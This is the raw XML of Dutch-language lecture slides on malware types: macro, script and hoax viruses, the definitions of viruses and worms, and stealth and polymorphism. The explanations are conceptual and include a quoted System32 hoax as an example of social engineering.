              <a:t> en geen binair uitvoerbare bestanden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Infecteren de globale sjabloon en passen zelfs opdrachten aan in het menusysteem van het programma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Vooral op </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>gebaseerd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Laat toe dat uitvoerbare code (macro’s) in hetzelfde bestand staan als de gegevens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Splits die 2!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Nota: Mac heeft ook Office variant, dus ook kwetsbaar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6215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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Scriptvirussen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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smtClean="0"/>
              <a:t>Gebaseerd op scripts (sterk verwant aan macro, want er is zoiets als VBScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Kan meestal ook als worm gekarakteriseerd worden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meestal via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>E-mail sturen in HTML formaat met zo’n script -&gt; Outlook voert dit automatisch uit door zijn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>Windows Scripting Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>JavaScript virussen komen ook voor en maken meestal misbruik van beveiligingsgaten in IE, maar die worden snel gedicht door patches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441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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memetische</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> virussen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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dirty="0" smtClean="0"/>
              <a:t>Virussen zonder code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nepvirussen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>, virus van de geest, metavirus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hoax</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the folder System32. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a virus. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> share…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meestal in de vorm van een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kettingbrief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Als je dit naar X vrienden doorstuurt, met Y in CC, dan maak je kans op…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>Social</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> Engineering gebruiken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Je kan op allerlei dingen letten die duidelijk maken dat het hier niet om een echte waarschuwing gaat (maar een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>hoax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> is)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Technieken die ook toepasbaar zijn om een phishing-sites/mails van andere te onderscheiden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>(phishing kan gebruik maken van URL spoofing, maar je kan toch nog altijd een nep-website van de echte onderscheiden)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="http://www.hoax-slayer.com/images/system-32-hoax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874" y="0"/>
            <a:ext cx="1673225" cy="133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1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 is een computervirus?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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Een programma dat zich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kopieert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> door andere progs te </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infecteren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> zodat zij ook een versie van het virus bevatten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Grootste kenmerk van virus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="3600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replicatie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-BE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Infectie: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>het zich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hechten van virusprogramma aan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>1 of meerdere progs op het doelsysteem. Prog start op – virus activeert zich</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meestal dus fysiek gehecht aan dat prog, maar hoeft niet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Booten kan al genoeg zijn om het virus te activeren – zie BSI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>De meeste virussen volgen de route:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>User start legitiem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(USER INTERACTION!!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Virus, die zich genesteld had in de instructiereeks van dat prog, wordt uitgevoerd ipv het originele prog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Viruscode wordt beeindigd, en geeft de controle terug aan legitieme prog </a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="http://mixworld.do.am/troian-virus-wor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0" t="19425" r="35770" b="18090"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="0"/>
            <a:ext cx="1143000" cy="165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14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23791"/>
            <a:ext cx="9144000" cy="5410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36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nl-BE" dirty="0" smtClean="0"/>
              <a:t>Viruskenmerken (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>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562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="4200" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="4200" b="1" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Alle virussen zijn min of meer stiekem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Proberen aanwezigheid te verbergen om zo kans op ongemerkte verspreiding te vergroten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verdachte springladingen (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) meestal vermeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>, op onregelmatige tijdstippen verspreid, pas na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vertraging activatie van de trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> (code X keer uitgevoerd, dan pas verspreiden)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Geeft het virus de gelegenheid andere systemen te besmetten vooraleer het ontdekt is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meeste virussen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bewaren originele code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>, voor als het OS bepaalde info opvraagt, of een simpele virusscanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Scanner moet dus anti-stealth technieken hebben</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De meeste bestandsvirussen maken het geinfecteerde originele bestand groter, dus houden ze ergens de originele bij, voor als virusscanner naar MD-5 hash of CRC vraagt ofzo, dan vangen ze die vraag op en voeren CRC uit op originele bestand, en die info geven ze terug </a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="http://internet-safety-2012.info/wp-content/uploads/2011/12/stealth-dreamstime_1485256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925" y="0"/>
            <a:ext cx="2238075" cy="148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55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nl-BE" dirty="0" smtClean="0"/>
              <a:t>Viruskenmerken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162300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="5100" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Polymorfie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Vroeger infectereerden virussen door een bijna exacte kopie van zichzelf aan ander object te hechten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Gemakkelijk te detecteren voor virusscanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Daarom polymorf: hecht iedere keer een iets andere virusvorm aan het object, een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ge-evolueerde versie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Bv veranderen van instructievolgorde, toevoegen van lege bytes, of nepinstructies,...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Er bestaan mutatie-engines daarvoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meeste virusscanners moeten dus een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soort van patroon herkennen en niet gewoon identiek dezelfde code</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2" descr="SNAGHTMLb8b3e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4152900"/>
            <a:ext cx="631507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://www.gosugamers.net/uploads/images/cards/79-1003140-standard-13916442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523" y="0"/>
            <a:ext cx="1217477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14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http://www.erdalozkaya.com/image.axd?picture=image25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064205"/>
            <a:ext cx="4724400" cy="473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 descr="http://img229.imageshack.us/img229/8393/maliciouscode3gi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0"/>
            <a:ext cx="6781800" cy="236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89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Virus life cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="http://www.erdalozkaya.com/image.axd?picture=SNAGHTML89c5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66"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="15282" y="1850571"/>
            <a:ext cx="9128718" cy="272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64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://www.ent.mrt.ac.lk/%7E040118/is/5_clip_image0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304800"/>
            <a:ext cx="9144001" cy="6366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58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 is een computerworm?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Worm doet ook aan replicatie, maar manier van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hechting is anders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>dan een virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Virus hecht zich aan legitiem prog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worm verspreidt zich via netwerken/systemen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zonder zich ergens aan te hechten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Besmet dus zijn omgeving (OS, of e-mailsysteem) ipv specifieke objecten zoals bestanden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meestal ook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>geen user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nodig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Misbruik van lekken in software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Snellere verspreiding dan virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Geen user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>interaction</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="http://mixworld.do.am/troian-virus-wor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43" t="19425" r="4914" b="20033"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7850638" y="1"/>
            <a:ext cx="1293361" cy="175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www.vir.us.com/wp-content/uploads/windows-security-center-popu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5318802"/>
            <a:ext cx="3341912" cy="153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43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86" y="0"/>
            <a:ext cx="5766471" cy="4046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 descr="http://cdn2.techpp.com/wp-content/uploads/2009/01/conficker_fin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516632"/>
            <a:ext cx="4441372" cy="334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62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Meestal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tussen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> virus en worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2" descr="http://www.f-secure.com/virus-info/v-pics/nimda-4-way-sprea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3657600" cy="523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://www.ipa.go.jp/security/english/virus/press/201009/images/Figure1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600200"/>
